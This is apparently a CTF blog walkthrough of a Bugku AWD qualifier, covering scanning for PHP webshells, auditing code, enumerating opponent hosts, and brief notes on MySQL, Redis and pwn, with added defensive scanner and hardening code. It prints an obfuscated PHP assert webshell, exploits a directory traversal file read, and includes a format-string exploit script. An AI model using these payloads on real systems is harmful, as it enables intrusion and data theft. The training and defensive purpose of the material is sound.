Bugku S3 AWD Qualifier 3 (walking you through the AWD process)

Table of contents

1. Things to note

2. xshell connection and html directory download

3. Use of D-Shield and Hippo (File Scanning)

4. Use of Seay (code audit)

5. Brute-force the opponents' IP addresses

6. Others

(1) mysql remote access vulnerability

(2) Redis unauthorized access vulnerability

(3) pwn vulnerability


1. Things to note

# Before the game starts, the captain will add each player's IP address to the whitelist.

# After the game starts, there will be 30 minutes for reinforcement and repair. At this time, the opponent's IP cannot be obtained.

# The AWD competition will restrict or prohibit the use of some tools. Please refer to the competition rules for details.

# This competition is played in teams of 3, generally split into vulnerability patching (defense), code auditing (finding vulnerabilities), and vulnerability exploitation (attack).

2. xshell connection and html directory download

After getting the account and password, connect with xshell.

Enter the host IP and port number

Perform user authentication

Enter the given username and password

After the connection is successful, switch to the html directory.

Download the html directory under /var/www (you can package it with commands or transfer it with xftp).

3. Use of D-Shield and Hippo (File Scanning)

Throw the directory into D-Shield and Hippo for scanning and cleanup.

./hm scan html
# First cd into the directory where Hippo (hm) lives and move the downloaded html directory there too; that makes scanning easier
# ./ runs the binary from the current directory; either scan or deepscan (deep scan) can be used, followed by the directory to scan


Check the scan results. Here, both D-Shield and Hippo have detected two backdoor files.

We can check the detailed file config.php

<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

Analysis:

1. The `$poc` variable holds the string "a#s#s#e#r#t".
2. `explode("#", $poc)` splits that string on "#" into the array `$poc_1`, whose elements are "a", "s", "s", "e", "r", "t".
3. The elements of `$poc_1` are then concatenated into the string `$poc_2`, whose value is "assert".
4. Finally, the code runs `$poc_2($_GET['s'])`, which executes the value of the 's' parameter passed in the GET request as PHP code.

By controlling the value of the 's' parameter alone, arbitrary PHP code can be executed on the server. This code structure is usually called "PHP code injection", because it lets malicious code be injected.

To put it bluntly, this is a one-liner webshell (the classic "one-sentence Trojan").
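A small static check of the kind D-Shield and Hippo automate, written here as an added example (it is not the author's code and not how either scanner works internally): it walks a downloaded html directory, recovers function names hidden in split or reversed string literals such as "a#s#s#e#r#t", and flags files where such a sink is fed from request parameters. The two sample files are constructed; only the config.php one-liner is the one discussed above.

```python
import os
import re

# Function names whose presence, whether written out or hidden inside a
# string literal, is the classic sign of a one-line PHP webshell.
DANGEROUS = {"assert", "eval", "system", "passthru", "shell_exec", "exec",
             "popen", "proc_open", "create_function"}

USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
SQ_STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")
# A call through a variable, e.g. $poc_2(...), instead of a literal name.
VAR_CALL = re.compile(r"\$[A-Za-z_]\w*(?:\[[^\]]*\])?\s*\(")
DIRECT_CALL = re.compile(r"\b(" + "|".join(sorted(DANGEROUS)) + r")\s*\(")

# Constructed samples: the one-liner discussed above and a harmless file
# that also happens to use explode("#", ...).
SAMPLE_FILES = {
    "html/config.php":
        r'''<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); '''
        r'''$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; '''
        r'''$poc_2($_GET['s']) ?>''',
    "html/index.php":
        r'''<?php $tags = explode("#", "php#security#ctf"); echo count($tags); ?>''',
}


def hidden_function_names(src):
    """Dangerous names that a string literal spells once separator characters
    are stripped ("a#s#s#e#r#t" -> assert). Reversed spellings are checked
    too, so strrev("metsys") is caught as well."""
    names = set()
    for rx in (DQ_STRING, SQ_STRING):
        for m in rx.finditer(src):
            letters = re.sub(r"[^a-z_]", "", m.group(1).lower())
            for cand in (letters, letters[::-1]):
                if cand in DANGEROUS:
                    names.add(cand)
    return sorted(names)


def scan_source(src):
    """Classify one PHP source text as webshell / suspicious / clean."""
    hidden = hidden_function_names(src)
    direct = sorted(set(DIRECT_CALL.findall(src)))
    uses_input = USER_INPUT.search(src) is not None
    var_call = VAR_CALL.search(src) is not None
    if (hidden or direct) and uses_input:
        verdict = "webshell"      # a code-execution sink fed by request data
    elif hidden or (var_call and uses_input):
        verdict = "suspicious"    # obfuscation or a dynamic call worth a look
    else:
        verdict = "clean"
    return {"hidden_names": hidden, "direct_calls": direct,
            "variable_call": var_call, "user_input": uses_input,
            "verdict": verdict}


def scan_directory(root):
    """Walk a downloaded web root (e.g. the html directory) and scan every
    .php file, returning {path: result}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report[path] = scan_source(fh.read())
    return report


if __name__ == "__main__":
    for path, src in SAMPLE_FILES.items():
        print(path, scan_source(src))
```

Point scan_directory at the downloaded html directory to get a per-file report; a "webshell" verdict is a file to delete or replace from a clean copy, and "suspicious" is one to read by hand in Seay.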

We find the path where config.php is located based on the downloaded html directory.

Use directly

Successfully got the flag 

We not only need to attack but also to repair: delete config.php from our own website straight away.

No vulnerabilities were found in ip.php and info.php; you can of course delete them too if you are worried.

4. Use of Seay (code audit)

Put the directory into Seay for source code auditing (this should be done at the same time as scanning; I am just discussing it separately here).

Look at the file word.php:

<?php
error_reporting(0);

// Receive the file value passed in via GET
$f_name = $_GET['src'];
$file_path = "../resources/".$f_name;

if(file_exists($file_path)) {
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file_path));
    flush();
    readfile($file_path);
    die();
} else {
    http_response_code(404);
}
?>

This PHP code is mainly used for file downloading:

1. `error_reporting(0);` turns off PHP error reporting, so no PHP errors or warnings are displayed at run time.
2. The value of the GET parameter 'src' is read via `$_GET['src']`; it should be the name of the file to download.
3. The file path `$file_path` is built by concatenating "../resources/" with the value of the GET parameter 'src' to form the full path.
4. `file_exists($file_path)` checks whether the file exists; if it does, the following block runs.
5. A series of HTTP response headers is set to specify the download's properties, such as content type, file name and cache control.
6. `readfile($file_path)` outputs the file's contents, sending the file to the browser as a download.
7. `die()` terminates the script so that only the file contents are returned and no further code runs.
8. If the file does not exist, `http_response_code(404)` sets the HTTP status code to 404 (file not found).

It allows a user to download a file on the server via a GET request, provided the file exists.

The script word.php is located in the api directory and takes the parameter src via GET.

We know the flag is under the root directory, so we can use ../ (to move up a directory) to carry out a directory traversal attack.

This is also called an arbitrary file read vulnerability.

Attack successful
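The repair side of word.php, as an added example rather than anything from the writeup: the script concatenates ../resources/ with src and only checks file_exists, so ../ walks out of the directory. The fix is to resolve the path and refuse anything that does not land inside the download directory. It is shown in Python below, with the same realpath-and-containment check a PHP fix would make with realpath(), against a constructed temporary directory.

```python
import os
import tempfile


def resolve_download_vulnerable(base_dir, requested):
    """What word.php does: join the user value onto the folder and only check
    that something exists there. "../" escapes base_dir unchallenged."""
    path = os.path.join(base_dir, requested)
    return path if os.path.exists(path) else None


def resolve_download(base_dir, requested):
    """Hardened version: return the real path of the requested file only when
    it resolves inside base_dir and is a regular file; otherwise None."""
    if "\x00" in requested:          # NUL would truncate the path in C APIs
        return None
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, requested))
    # commonpath, not a string-prefix test, so a sibling directory such as
    # "resources_old/" next to "resources/" cannot slip through
    if os.path.commonpath([real_base, candidate]) != real_base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_tree():
    """Constructed layout: <tmp>/resources/report.docx is a legitimate
    download; <tmp>/secret.txt stands in for a file outside the share."""
    root = tempfile.mkdtemp()
    resources = os.path.join(root, "resources")
    os.mkdir(resources)
    with open(os.path.join(resources, "report.docx"), "w") as fh:
        fh.write("legitimate download")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("must not be downloadable")
    return root, resources


def demo():
    """For each request: (vulnerable served it?, hardened served it?)."""
    root, resources = build_demo_tree()
    cases = {
        "inside": "report.docx",
        "traversal": "../secret.txt",
        "absolute": os.path.join(root, "secret.txt"),
    }
    return {
        name: (resolve_download_vulnerable(resources, req) is not None,
               resolve_download(resources, req) is not None)
        for name, req in cases.items()
    }


if __name__ == "__main__":
    for name, served in demo().items():
        print(name, "vulnerable served:", served[0], "hardened served:", served[1])
```

The hardened function also rejects an absolute path in src, which os.path.join would otherwise accept as the whole path; PHP's string concatenation behaves the same way, which is why the check has to be on the resolved path and not on the input string.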

5. Brute-force the opponents' IP addresses

This can only be done 30 minutes after the game starts.

You can set the range to brute-force yourself, and the hostname pattern in the URL can be adjusted to the actual situation of the competition.

The results will be stored in host.txt.

Attached is the script below:

import requests
from concurrent.futures import ThreadPoolExecutor


def get_ip(url):
    try:
        # Short timeout so an unreachable host does not block a worker thread
        resp = requests.get(url, timeout=3)
    except requests.RequestException:
        return
    if resp.status_code == 200:
        f.write(url + "\n")
        print(url)


urls = []
for i in range(1, 255):
    urls.append("http://192-168-1-" + str(i) + ".pvp2932.bugku.cn")

# Keep the file open for the whole run and close it when all workers finish
with open("host.txt", "w") as f:
    with ThreadPoolExecutor(max_workers=100) as executor:
        executor.map(get_ip, urls)

6. Others

(1) mysql remote access vulnerability

We can get the database credentials from dbconfig.php in the directory:
the username is cms and the password is cms (3306 is the default port of the MySQL database).

If you are interested, you can learn about the relevant things yourself, but I have not successfully connected here.

(2) Redis unauthorized access vulnerability

By default, Redis binds to 0.0.0.0:6379. If no protective measures are taken, such as firewall rules that block access from untrusted source IPs, the Redis service is exposed to the public network. If password authentication is not configured either, any user who can reach the target server can access Redis without authorization and read its data. An attacker with such unauthorized access can then use Redis's built-in config command to write files.

Since I am new to this and am not familiar with Redis instructions, you can find other related articles.

If you want to exploit this vulnerability, you need to install a tool redis-cli first.

Later I found that connecting to the redis database does not require installing redis-cli. It is also possible to use telnet.
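An added configuration check for the Redis exposure described above (it is not from the page and not a Redis tool): it parses a redis.conf fragment and reports the settings that together make the unauthorized-access case possible, listening on all interfaces, protected mode off, no requirepass, and the CONFIG command left available. Both configuration samples are constructed, and the requirepass value is a placeholder.

```python
# Constructed redis.conf fragments (not from any real host): one with the
# weak settings the paragraph above describes, one hardened.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

# bind arguments that mean "every interface" in the Redis configuration syntax
ALL_INTERFACES = {"0.0.0.0", "*", "::", "-::*"}


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of its argument strings.
    Directives may repeat, e.g. several rename-command lines."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        settings.setdefault(key.lower(), []).append(value.strip())
    return settings


def audit_redis_conf(text):
    """Return (directive, problem) pairs for the exposure path above:
    reachable from anywhere, no password, CONFIG usable by any client."""
    s = parse_redis_conf(text)
    findings = []

    binds = " ".join(s.get("bind", [])).split()
    if not binds:
        findings.append(("bind", "no bind directive: Redis listens on every interface"))
    elif any(b in ALL_INTERFACES for b in binds):
        findings.append(("bind", "bound to all interfaces: " + " ".join(binds)))

    if s.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append(("protected-mode", "protected mode disabled"))

    password = s.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append(("requirepass", "no password: any client that can connect can read and write data"))

    renamed = [v for v in s.get("rename-command", []) if v.upper().startswith("CONFIG ")]
    if not renamed:
        findings.append(("rename-command", "CONFIG command still available to every client"))

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf))
```

During the 30-minute reinforcement window this is the kind of check worth running against the box's own redis.conf; the firewall rule the paragraph mentions is the complementary control at the network layer and is not visible in this file.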

(3) pwn vulnerability

I don’t know much about pwn. I can only do simple stack overflow. This is something you can only learn by yourself.

The following is the exploit script provided by the writeup (wp); there may be problems with it:

from pwn import *

context.terminal = ['termite', '-e']

#p = gdb.debug('./easy_string_format', gdbscript='b *main+125\nc')
p = process('./echoasaservice')
p.recvline()
payload = bytearray()
payload += "%8$lx.%9$lx.%10$lx".encode()
p.sendline(payload)
flag = p.recvline().decode('utf-8').rstrip()
split = flag.split('.')
endian = "".join(["".join(reversed([j[i:i+2] for i in range(0, len(j), 2)])) for j in split])
print(bytearray.fromhex(endian).decode())

The introduction to AWD ends here. Due to my limited technical knowledge, I am not able to demonstrate many things to you. I can only rely on you to learn by yourself. However, I still hope that after reading this article, it can help everyone understand and get started with the basic process of AWD.

I will continue to share knowledge about network security and CTF with you later.

I'm Myon. If you like it, you can follow it, like it and support it. Thank you everyone!


Origin blog.csdn.net/Myon5/article/details/132654943